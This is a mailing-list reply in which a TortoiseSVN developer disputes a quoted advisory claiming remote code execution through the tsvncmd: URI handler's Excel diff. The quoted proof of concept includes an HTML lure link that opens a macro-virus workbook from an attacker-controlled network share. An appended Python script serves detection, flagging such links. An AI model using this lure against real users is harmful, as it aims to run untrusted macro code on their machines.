On Tuesday, July 30, 2019 at 4:27:37 PM UTC+2, (unknown) wrote:
>
> Current Estimated Price:
> ========================
> 4.000€ - 5.000€
>

Can I get at least some of that?

> Technical Details & Description:
> ================================
> A remote code execution vulnerability has been uncovered in the official
> TortoiseSVN v1.12.1 software.
> The vulnerability type allows a remote attacker to execute arbitrary codes
> to compromise a target computer system.
>
> The URI handler of TortoiseSVN (Tsvncmd:) allows a customised diff
> operation on Excel workbooks, which could be used to open remote
> workbooks without protection from macro security settings to execute
> arbitrary code.
>
> The `tsvncmd:command:diff?path:[file1]?path2:[file2]` will execute a
> customised diff on [file1] and [file2] based on the file extension.
> For xls files, it will execute the script `diff-xls.js` using wscript,
> which will open the two files for analysis without any macro
> security warning. An attacker can exploit this by putting a macro virus in
> a network drive, and force the victim to open the workbooks
> and execute the macro inside. Since the macro is triggered through
> wscript, to make the attack less visible, one could kill the wscript
> process and quit the excel program after the code was executed.
>

I don't get it:
First you have to somehow persuade a user to click a link. Then the browser will ask whether to execute TortoiseProc. If you then click "yes", only then TortoiseProc will execute and start the diff script. The diff script then starts MS Excel to do a diff (not execute macros).

So: even if you could do all this, wouldn't the security issue be in Excel because it executes the macros without asking first?
And last time I checked: Excel never executed a macro inside my test files ever without asking first. Ok, I admit my last test was with Office 2013 but still.

> Proof of Concept (PoC):
> =======================
> The vulnerability could be triggered by visiting a specially crafted URL
> via web browser.
> To reproduce the vulnerability, one could simply create a .url file or
> open the URL with a browser,
> but a notification prompt may be shown for the latter case.
>
> <a href='tsvncmd:command:diff?path:\VBoxSvrvv.xlsm?path2:\VBoxSvrvw.xlsx'>Checkout the Repo with TortoiseSVN</a>
>
> where VBoxSvrv is the remote network drive controlled by the attacker,
> v.xlsm is the macro virus and w.xlsx is just an empty excel workbook.
>
> Sources: https://www.vulnerability-lab.com/resources/documents/2188.rar
> Password: 23vxrl23
>
> PoC: Video
> https://www.youtube.com/watch?v=spvRSC377vI

"Video not available".

>
> Security Risk:
> ==============
> The security risk of the remote code execution vulnerability in the
> software component is estimated as high.
>
>
> Credits & Authors:
> ==================
> PingFanZettaKe [VXRL Team] -
> https://www.vulnerability-lab.com/show.php?user=PingFanZettaKe
>

I have some problems with people that don't reveal their names.

And seriously: you found this mailing list. But you couldn't find a way to contact me directly first?

So please: can you give an exact description of what the security issue is here? Because I can't see one.

Stefan
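For defenders who want to spot links of the shape discussed in this thread, the following is an added example, not part of the original message or of TortoiseSVN. It assumes only the `tsvncmd:command:diff?path:[file1]?path2:[file2]` syntax quoted above; the function names, the extension list and the sample input are constructed for illustration.

```python
import re

# Workbook extensions the quoted report is concerned with (assumed list).
MACRO_EXTS = (".xls", ".xlsm", ".xlsb")
# Matches tsvncmd: links inside an HTML href or the URL= line of a .url file.
LINK_RE = re.compile(r"tsvncmd:[^\s'\"<>]+", re.IGNORECASE)

# Constructed sample: one remote workbook diff, one local text diff.
SAMPLE = (
    "<a href='tsvncmd:command:diff?path:\\\\fileserver\\share\\a.xlsm"
    "?path2:\\\\fileserver\\share\\b.xlsx'>link</a>\n"
    "[InternetShortcut]\n"
    "URL=tsvncmd:command:diff?path:C:\\work\\a.txt?path2:C:\\work\\b.txt\n"
)

def parse_tsvncmd(uri):
    """Split 'tsvncmd:command:diff?path:A?path2:B' into (command, params)."""
    scheme, _, rest = uri.partition(":")
    if scheme.lower() != "tsvncmd":
        raise ValueError("not a tsvncmd: URI")
    head, *pairs = rest.split("?")
    command = head.partition(":")[2] if head.lower().startswith("command:") else ""
    params = {}
    for pair in pairs:
        key, _, value = pair.partition(":")  # first ':' only, so C:\ paths survive
        params[key.lower()] = value
    return command.lower(), params

def is_remote(path):
    """UNC or URL-style paths point off the local machine."""
    return path.startswith(("\\\\", "//")) or "://" in path

def findings(text):
    """Return (uri, reasons) for each diff link that references remote or workbook paths."""
    out = []
    for uri in LINK_RE.findall(text):
        command, params = parse_tsvncmd(uri)
        if command != "diff":
            continue
        reasons = []
        for key in ("path", "path2"):
            value = params.get(key, "")
            if is_remote(value):
                reasons.append(f"{key} is remote")
            if value.lower().endswith(MACRO_EXTS):
                reasons.append(f"{key} is macro-capable workbook")
        if reasons:
            out.append((uri, reasons))
    return out
```

Running `findings(SAMPLE)` reports only the first link; the local text-file diff is not flagged.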
